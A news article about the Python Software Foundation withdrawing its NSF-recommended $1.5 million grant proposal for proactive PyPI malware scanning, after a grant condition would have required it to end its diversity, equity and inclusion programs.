Python, one of the world's most popular programming languages, powers countless open-source projects and commercial applications. However, its vast and active ecosystem also brings security risks, particularly supply chain vulnerabilities. To address these challenges, the Python Software Foundation (PSF) submitted a $1.5 million grant proposal to the U.S. National Science Foundation (NSF)—marking its first attempt at securing government funding.

However, the process took an unexpected turn. Recently, PSF announced on its official website and Reddit that it withdrew the NSF-approved proposal due to unacceptable conditions, including a requirement to halt all diversity, equity, and inclusion (DEI) initiatives. This decision has sparked widespread discussion in the open-source and tech communities amid an increasingly complex global tech landscape.

**The Security-Focused Proposal** The PSF's proposal fell under NSF's "Secure and Trustworthy Open-Source Ecosystems" program, aiming to enhance Python's security, particularly for PyPI (Python Package Index). The project planned to develop automated tools for proactive malware scanning of PyPI uploads, replacing the current reactive approach. These tools would leverage "capability analysis" based on known malicious software datasets, with potential applications for other open-source registries like NPM and Crates.io.

PSF dedicated significant effort to the proposal, with Security Developer-in-Residence Seth Larson as Principal Investigator (PI) and Deputy Executive Director Loren Crary as co-PI. "Navigating the complex application process was a steep learning curve for our small team," PSF stated. "We believed this project aligned perfectly with our mission and could bring substantial benefits to the community." After months of review, the proposal secured NSF's recommendation—a notable achievement given NSF's 36% approval rate for first-time applicants.

**The Controversial Conditions** The celebration was short-lived. NSF attached a clause requiring PSF to confirm it would "not operate or promote any programs advancing DEI or engage in activities violating federal anti-discrimination laws" during the grant period. PSF's legal counsel clarified this restriction applied to all foundation activities, not just the funded project. Worse, NSF reserved the right to reclaim disbursed funds if violated, posing what PSF called "an unquantifiable financial risk."

For PSF, whose mission emphasizes fostering a diverse global Python community, accepting these terms meant compromising core values. While the grant—equivalent to 60% of PSF's $5M annual budget—would significantly bolster Python's security, the foundation faced a dilemma: growth versus principles.

**A Unanimous Decision** After internal voting, PSF's board unanimously chose to withdraw. "No project or funding should override our values or mission," PSF declared. Simon Willison, Django creator and PSF board member, supported the move on his blog: "Accepting the grant carried existential risks. I’m proud our board made this tough, united decision."

The tech community largely applauded PSF's stance. Some noted major Python-using corporations could easily cover the $1.5M infrastructure costs, given the project's importance. Others called it a "pragmatic choice," avoiding potential financial ruin.

PSF now calls for community support to continue its independent work. This case underscores the broader challenge for open-source organizations: balancing funding opportunities with unwavering commitment to their values.

What are your thoughts on PSF's decision?